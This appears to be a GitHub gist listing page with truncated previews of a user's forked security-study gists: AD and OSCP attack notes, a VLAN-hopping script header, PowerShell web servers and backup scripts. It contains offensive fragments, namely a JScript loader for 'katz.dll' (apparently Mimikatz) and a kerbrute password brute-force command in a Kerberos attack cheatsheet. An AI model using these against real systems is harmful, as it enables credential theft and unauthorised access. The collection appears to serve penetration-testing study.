Note: I did not author this, i found it somehwere.
- Tools
- Most common paths to AD compromise
- [GPO - Pivoting with Local Admin
zpaav
/ osed-rp-helper.ps1
Created
June 4, 2025 20:48
— forked from 2S1one/osed-rp-helper.ps1
RP powershell wrapper
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $max_depth = 6 | |
| $rp_exe_path = "C:\tools\rp-win-x86.exe" | |
| $out_dir = Join-Path (Get-Location) "rp_output" | |
| $all_prefix = "all_" | |
| $target_files = $args | |
| # Ensure the output directory exists | |
| New-Item -ItemType Directory -Path $out_dir -Force -ErrorAction SilentlyContinue | Out-Null |
zpaav
/ AD-OSCP.md
Created
June 9, 2022 01:40
— forked from RajChowdhury240/AD-OSCP.md
Active Directory Attacks OSCP
zpaav
/ VLANHopperDTP.py
Created
May 20, 2022 16:55
— forked from mgeeky/VLANHopperDTP.py
VLAN Hopping via DTP Trunk (Switch) Spoofing exploit - script automating full VLAN Hopping attack, from DTP detection to VLAN Hop with DHCP lease request.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # This script is performing DTP Trunk mode detection and VLAN Hopping | |
| # attack automatically, running sniffer afterwards to collect any other | |
| # VLAN available. To be launched only in Unix/Linux environment as the | |
| # script utilizes following applications: | |
| # - 8021q.ko | |
| # - vconfig | |
| # - ifconfig / ip / route |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools'; | |
| try { | |
| var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="AllTheThings" version="0.0.0.0"/> <file name="katz.dll"> <comClass description="AllTheThings Class" clsid="{89565276-A714-4a43-912E-978BFEEDACDC}" threadingModel="Both" progid="AllTheThings"/> </file> </assembly>'; | |
| var ax = new ActiveXObject("Microsoft.Windows.ActCtx"); | |
| ax.ManifestText = manifest; | |
| // Create Base64 Object, supports encode, decode | |
| var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.characters.charAt(s)+Base64.characters. |
zpaav
/ script-template.sh
Created
February 20, 2021 21:33
— forked from m-radzikowski/script-template.sh
Minimal safe Bash script template - see the article with full description: https://betterdev.blog/minimal-safe-bash-script-template/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| set -Eeuo pipefail | |
| trap cleanup SIGINT SIGTERM ERR EXIT | |
| script_dir=$(cd "$(dirname "${BASH_SOURCE[0]}")" &>/dev/null && pwd -P) | |
| usage() { | |
| cat <<EOF | |
| Usage: $(basename "${BASH_SOURCE[0]}") [-h] [-v] [-f] -p param_value arg1 [arg2...] |
zpaav
/ WAHH_Task_Checklist.md
Created
December 16, 2020 05:01
— forked from jhaddix/Testing_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
Web Application Hacker's Handbook Task checklist as a Github-Flavored Markdown file
zpaav
/ HTTPServer.ps1
Created
October 16, 2020 04:21
— forked from jakobii/HTTPServer.ps1
A Basic Powershell Webserver
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # You Should be able to Copy and Paste this into a powershell terminal and it should just work. | |
| # To end the loop you have to kill the powershell terminal. ctrl-c wont work :/ | |
| # Http Server | |
| $http = [System.Net.HttpListener]::new() | |
| # Hostname and port to listen on | |
| $http.Prefixes.Add("http://localhost:8080/") |
zpaav
/ powershell-web-server.ps1
Created
October 16, 2020 04:11
— forked from 19WAS85/powershell-web-server.ps1
A simple web server built with powershell.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This is a super **SIMPLE** example of how to create a very basic powershell webserver | |
| # 2019-05-18 UPDATE — Created by me and and evalued by @jakobii and the comunity. | |
| # Http Server | |
| $http = [System.Net.HttpListener]::new() | |
| # Hostname and port to listen on | |
| $http.Prefixes.Add("http://localhost:8080/") | |
| # Start the Http Server |
zpaav
/ kerberos_attacks_cheatsheet.md
Created
June 4, 2020 03:30
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
zpaav
/ backupToS3.sh
Created
May 23, 2020 06:31
— forked from autoize/backupToS3.sh
NextCloud Backup to Amazon S3
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # NextCloud to Amazon S3 Backup Script | |
| # Author: Autoize (autoize.com) | |
| # This script creates an incremental backup of your NextCloud instance to Amazon S3. | |
| # Amazon S3 is a highly redundant block storage service with versioning and lifecycle management features. | |
| # Requirements | |
| # - Amazon AWS Account and IAM User with AmazonS3FullAccess privilege |
NewerOlder